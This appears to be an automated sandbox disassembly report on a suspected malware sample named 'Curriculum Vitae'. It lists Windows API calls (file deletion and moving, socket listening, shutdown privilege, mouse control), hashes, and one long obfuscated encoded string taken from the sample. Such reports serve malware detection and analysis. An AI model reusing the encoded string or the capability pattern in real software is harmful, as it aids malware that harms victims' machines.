                      • Instruction Fuzzy Hash: 2161BB34204302AFD700EF24D898F6AB7A4EF85714F18551DF59AD72A2DB71E906CBB2
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00DA69BE
                      • FindClose.KERNEL32(00000000), ref: 00DA6A12
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DA6A4E
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DA6A75
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DA6AB2
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DA6ADF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                      • API String ID: 3830820486-3289030164
                      • Opcode ID: 4ce88f02b5d15a94fc256192bc39bbb96d59c9832fd32fbbf1802a02cf916c7c
                      • Instruction ID: 36747167d6c3f21823c9f0d5a3f9fa812b8d4e67f4f003bfd246435e31d9c294
                      • Opcode Fuzzy Hash: 4ce88f02b5d15a94fc256192bc39bbb96d59c9832fd32fbbf1802a02cf916c7c
                      • Instruction Fuzzy Hash: A7D15FB2508300AFC714EBA4C995EABB7ECEF89704F04491DF589D6291EB74DA44CB72
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DA9663
                      • GetFileAttributesW.KERNEL32(?), ref: 00DA96A1
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00DA96BB
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00DA96D3
                      • FindClose.KERNEL32(00000000), ref: 00DA96DE
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00DA96FA
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA974A
                      • SetCurrentDirectoryW.KERNEL32(00DF6B7C), ref: 00DA9768
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA9772
                      • FindClose.KERNEL32(00000000), ref: 00DA977F
                      • FindClose.KERNEL32(00000000), ref: 00DA978F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1409584000-438819550
                      • Opcode ID: e40c753896e58f66dbbfff0fd15df3785bf1ab0e976026b2e5ff5511c4428850
                      • Instruction ID: e61aaf0d628c70900661dee5753e788248ca2ea35de3ce44c6cdf6707a7ac575
                      • Opcode Fuzzy Hash: e40c753896e58f66dbbfff0fd15df3785bf1ab0e976026b2e5ff5511c4428850
                      • Instruction Fuzzy Hash: 9331C23250021A6EDF14EFB4EC18EEEB7ACDF4A361F184155FA09E2190DB30D9448A34
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DA97BE
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00DA9819
                      • FindClose.KERNEL32(00000000), ref: 00DA9824
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00DA9840
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA9890
                      • SetCurrentDirectoryW.KERNEL32(00DF6B7C), ref: 00DA98AE
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA98B8
                      • FindClose.KERNEL32(00000000), ref: 00DA98C5
                      • FindClose.KERNEL32(00000000), ref: 00DA98D5
                        • Part of subcall function 00D9DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D9DB00
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 2640511053-438819550
                      • Opcode ID: c766ba28d5c6164320865fabf5c0df5b9aad982c034ff492b4da2eacfbf99440
                      • Instruction ID: e1d9a45fdf6dc6d1e9d57d48dfd1ae0a378cc958a550c088abf2fb81797e423c
                      • Opcode Fuzzy Hash: c766ba28d5c6164320865fabf5c0df5b9aad982c034ff492b4da2eacfbf99440
                      • Instruction Fuzzy Hash: 4631A33250061A6EDF10EFB4EC58EEEB7ACDF47360F148156E958E2190DB34D9498B74
                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 00DA8257
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA8267
                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DA8273
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DA8310
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA8324
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA8356
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DA838C
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA8395
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CurrentDirectoryTime$File$Local$System
                      • String ID: *.*
                      • API String ID: 1464919966-438819550
                      • Opcode ID: 2079271cea2a14c6c4c6f9e74f6be36e5936461b3074a752a14bf3e31d212002
                      • Instruction ID: bebdb168536fc76b31b92158163f0b8d738d6f0732f31130209c39d8274b4d02
                      • Opcode Fuzzy Hash: 2079271cea2a14c6c4c6f9e74f6be36e5936461b3074a752a14bf3e31d212002
                      • Instruction Fuzzy Hash: 2B6139725043459FCB10EF64C841AAEB3E8FF89314F04891AF999D7251EB35E945CBB2
                      APIs
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                        • Part of subcall function 00D9E199: GetFileAttributesW.KERNEL32(?,00D9CF95), ref: 00D9E19A
                      • FindFirstFileW.KERNEL32(?,?), ref: 00D9D122
                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00D9D1DD
                      • MoveFileW.KERNEL32(?,?), ref: 00D9D1F0
                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D9D20D
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D9D237
                        • Part of subcall function 00D9D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00D9D21C,?,?), ref: 00D9D2B2
                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00D9D253
                      • FindClose.KERNEL32(00000000), ref: 00D9D264
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                      • String ID: \*.*
                      • API String ID: 1946585618-1173974218
                      • Opcode ID: 48ed22ec3cad851ad0afd23ec1a68ed43b7633c92cda4a62ec4758a8dfb94972
                      • Instruction ID: 83ff196688c79b5da60cf02dfa34627f81c458f8017bce52cdef025a5e045dc4
                      • Opcode Fuzzy Hash: 48ed22ec3cad851ad0afd23ec1a68ed43b7633c92cda4a62ec4758a8dfb94972
                      • Instruction Fuzzy Hash: C0615B3190520DABCF05EBE4DA929EDB7B6EF55300F644165E446B71A1EB30AF09CB70
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: 2e0a1584ab8f5c67648f31d8758d9ebf2ce93d8dc75f3dc5dd516cc6a9586904
                      • Instruction ID: 5a8ba82be8a724f154bacf3b58d5d9b9c233bfa97c37e8e1eff3b9937cef0b19
                      • Opcode Fuzzy Hash: 2e0a1584ab8f5c67648f31d8758d9ebf2ce93d8dc75f3dc5dd516cc6a9586904
                      • Instruction Fuzzy Hash: AA419A35204612AFE720DF15D888F19BBE1EF45329F18D499E4598B762C735ED42CBA0
                      APIs
                        • Part of subcall function 00D916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9170D
                        • Part of subcall function 00D916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D9173A
                        • Part of subcall function 00D916C3: GetLastError.KERNEL32 ref: 00D9174A
                      • ExitWindowsEx.USER32(?,00000000), ref: 00D9E932
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $ $@$SeShutdownPrivilege
                      • API String ID: 2234035333-3163812486
                      • Opcode ID: bb28375fb786e962d6556001d20c922414c45c701cf43e30f17d15f48f127806
                      • Instruction ID: 21cf9b3fdcd29d0740efb8c9e92a806ee59e16e0db9e6d0f40e09ed11504ba52
                      • Opcode Fuzzy Hash: bb28375fb786e962d6556001d20c922414c45c701cf43e30f17d15f48f127806
                      • Instruction Fuzzy Hash: 5801D672A20312BFEF64A7B49C86FBB736CE714750F194521FD03E21D2D9A19C4089B4
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00DB1276
                      • WSAGetLastError.WSOCK32 ref: 00DB1283
                      • bind.WSOCK32(00000000,?,00000010), ref: 00DB12BA
                      • WSAGetLastError.WSOCK32 ref: 00DB12C5
                      • closesocket.WSOCK32(00000000), ref: 00DB12F4
                      • listen.WSOCK32(00000000,00000005), ref: 00DB1303
                      • WSAGetLastError.WSOCK32 ref: 00DB130D
                      • closesocket.WSOCK32(00000000), ref: 00DB133C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$closesocket$bindlistensocket
                      • String ID:
                      • API String ID: 540024437-0
                      • Opcode ID: 7bcb8f516045a6a0aeb57a5f58a43dd3ab0bf5786e69e48a53112fa139e6cdad
                      • Instruction ID: b1fdc2598abc43043ee07cee94025e8e4e6aa4f9bebbc0384fe8f472a46d72bb
                      • Opcode Fuzzy Hash: 7bcb8f516045a6a0aeb57a5f58a43dd3ab0bf5786e69e48a53112fa139e6cdad
                      • Instruction Fuzzy Hash: 14418D35A00201DFD710DF24C499B6ABBE5AF86318F588198E95A9F392C771ED81CBF1
                      APIs
                      • _free.LIBCMT ref: 00D6B9D4
                      • _free.LIBCMT ref: 00D6B9F8
                      • _free.LIBCMT ref: 00D6BB7F
                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00DD3700), ref: 00D6BB91
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D6BC09
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E01270,000000FF,?,0000003F,00000000,?), ref: 00D6BC36
                      • _free.LIBCMT ref: 00D6BD4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                      • String ID:
                      • API String ID: 314583886-0
                      • Opcode ID: 0aa356ab03adce4b65d27ee95348fec696f046ef3f4fc0b3e027b57b8a54dfe5
                      • Instruction ID: 915dc0a99a58f95fc69efbeab29a1365afc72149ad8ba48b589df981444c1df4
                      • Opcode Fuzzy Hash: 0aa356ab03adce4b65d27ee95348fec696f046ef3f4fc0b3e027b57b8a54dfe5
                      • Instruction Fuzzy Hash: A1C10571A04205AFDB249F798C41AAA7BB9EF41370F18419BE494DB252E7319EC5CB70
                      APIs
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                        • Part of subcall function 00D9E199: GetFileAttributesW.KERNEL32(?,00D9CF95), ref: 00D9E19A
                      • FindFirstFileW.KERNEL32(?,?), ref: 00D9D420
                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D9D470
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D9D481
                      • FindClose.KERNEL32(00000000), ref: 00D9D498
                      • FindClose.KERNEL32(00000000), ref: 00D9D4A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                      • String ID: \*.*
                      • API String ID: 2649000838-1173974218
                      • Opcode ID: cc74fd6c51b5f1214ded6f79ce80f30629b40e56c39c694bf9ecf8b757b2965b
                      • Instruction ID: da6b0b9bca4bab24245dc222869001fed1f4bc0f25123255062d7c82b32fa019
                      • Opcode Fuzzy Hash: cc74fd6c51b5f1214ded6f79ce80f30629b40e56c39c694bf9ecf8b757b2965b
                      • Instruction Fuzzy Hash: 74316C710183869FC704EF64D9919AFB7A8EE91314F844A1DF4D5932A1EB30EA09CB77
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 1d9a9fea8f1ff997aa3f97b5edb9efbcd6332ba419b8e4a4e3d54be58f40ae1e
                      • Instruction ID: b532e09ca3cc902006310e6402ac80ea3c1edf4bdbf912c6a5839a62b6ecc648
                      • Opcode Fuzzy Hash: 1d9a9fea8f1ff997aa3f97b5edb9efbcd6332ba419b8e4a4e3d54be58f40ae1e
                      • Instruction Fuzzy Hash: 00C24B75E086288FDB25CF28DD407EAB7B5EB44305F1841EAD84EE7241E774AE858F60
                      APIs
                      • _wcslen.LIBCMT ref: 00DA64DC
                      • CoInitialize.OLE32(00000000), ref: 00DA6639
                      • CoCreateInstance.OLE32(00DCFCF8,00000000,00000001,00DCFB68,?), ref: 00DA6650
                      • CoUninitialize.OLE32 ref: 00DA68D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: b4fb9b681d2eb9455c3797a0ae1faa2e8ab438e8ac57029a35cd0472be3c912c
                      • Instruction ID: bd363a45a7cc93e0b302af5fbfd763d9056888780adfca15a8558a9b2042be68
                      • Opcode Fuzzy Hash: b4fb9b681d2eb9455c3797a0ae1faa2e8ab438e8ac57029a35cd0472be3c912c
                      • Instruction Fuzzy Hash: 36D13871508201AFC314EF24C891E6BB7E9FF95704F04896DF5958B291EB70E909CBB2
                      APIs
                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00DB22E8
                        • Part of subcall function 00DAE4EC: GetWindowRect.USER32(?,?), ref: 00DAE504
                      • GetDesktopWindow.USER32 ref: 00DB2312
                      • GetWindowRect.USER32(00000000), ref: 00DB2319
                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DB2355
                      • GetCursorPos.USER32(?), ref: 00DB2381
                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DB23DF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                      • String ID:
                      • API String ID: 2387181109-0
                      • Opcode ID: ad91798d11a86ba705abeb70a0bf10e27bee73abdd99b63ab8247b05749c214d
                      • Instruction ID: 0c9881742557d3d4c5b5096f99b3c5a78c6c0e1c8bc600f56b2e7bd90a3217d8
                      • Opcode Fuzzy Hash: ad91798d11a86ba705abeb70a0bf10e27bee73abdd99b63ab8247b05749c214d
                      • Instruction Fuzzy Hash: 28319072504316ABDB20DF54C849EABB7E9FB84314F04091DF58AD7291D734E909CBA2
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DA9B78
                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DA9C8B
                        • Part of subcall function 00DA3874: GetInputState.USER32 ref: 00DA38CB
                        • Part of subcall function 00DA3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DA3966
                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DA9BA8
                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DA9C75
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                      • String ID: *.*
                      • API String ID: 1972594611-438819550
                      • Opcode ID: 162c552ca151bd154a5ad44f24d77597179532e4e6fd858d6ea4e884711ebca9
                      • Instruction ID: caf912f21b25071fb5b7fa83f21041a6fb049e6748e0088f8a917d1d7e96cdf9
                      • Opcode Fuzzy Hash: 162c552ca151bd154a5ad44f24d77597179532e4e6fd858d6ea4e884711ebca9
                      • Instruction Fuzzy Hash: 0041607194460A9FCF14DFA4DD99AEEBBB8EF06310F248156E909A3191EB309E44CF70
                      Strings
                      • VUUU, xrefs: 00D3843C
                      • E31Y30E36U33Q39Y35L35K66W34V37V64V32E66A38S62W34A35S66P63U38X62Q34N64Q30D63F33H62U34W38I30B63I37V32O32X32O38P62H35K35N66Y63C38L62R34E32B30X63D38E62R34H64V66G63U30F33D34P31X31H30U33M39R34K35H30Y63H37B33N31Y31Y38W62N35R35H66S63N38C62N34C35U30V63X32L62D34D32M30Q6, xrefs: 00D3839B, 00D383A6
                      • VUUU, xrefs: 00D383E8
                      • VUUU, xrefs: 00D383FA
                      • VUUU, xrefs: 00D75DF0
                      • ERCP, xrefs: 00D3813C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: E31Y30E36U33Q39Y35L35K66W34V37V64V32E66A38S62W34A35S66P63U38X62Q34N64Q30D63F33H62U34W38I30B63I37V32O32X32O38P62H35K35N66Y63C38L62R34E32B30X63D38E62R34H64V66G63U30F33D34P31X31H30U33M39R34K35H30Y63H37B33N31Y31Y38W62N35R35H66S63N38C62N34C35U30V63X32L62D34D32M30Q6$ERCP$VUUU$VUUU$VUUU$VUUU
                      • API String ID: 0-1572202391
                      • Opcode ID: 3d635225499cba704fb1ec24224a9689d0741a215733bbfe0dbf83c8643b3967
                      • Instruction ID: 4b321d6eec1241ceb075adf7a3a4c8188db6cbb41187a19271a88311df776496
                      • Opcode Fuzzy Hash: 3d635225499cba704fb1ec24224a9689d0741a215733bbfe0dbf83c8643b3967
                      • Instruction Fuzzy Hash: 2FA27071E0071ACBDF24CF58C8417AEB7B1BF54314F2881A9E859A7285EB70DD81DBA1
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D49A4E
                      • GetSysColor.USER32(0000000F), ref: 00D49B23
                      • SetBkColor.GDI32(?,00000000), ref: 00D49B36
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
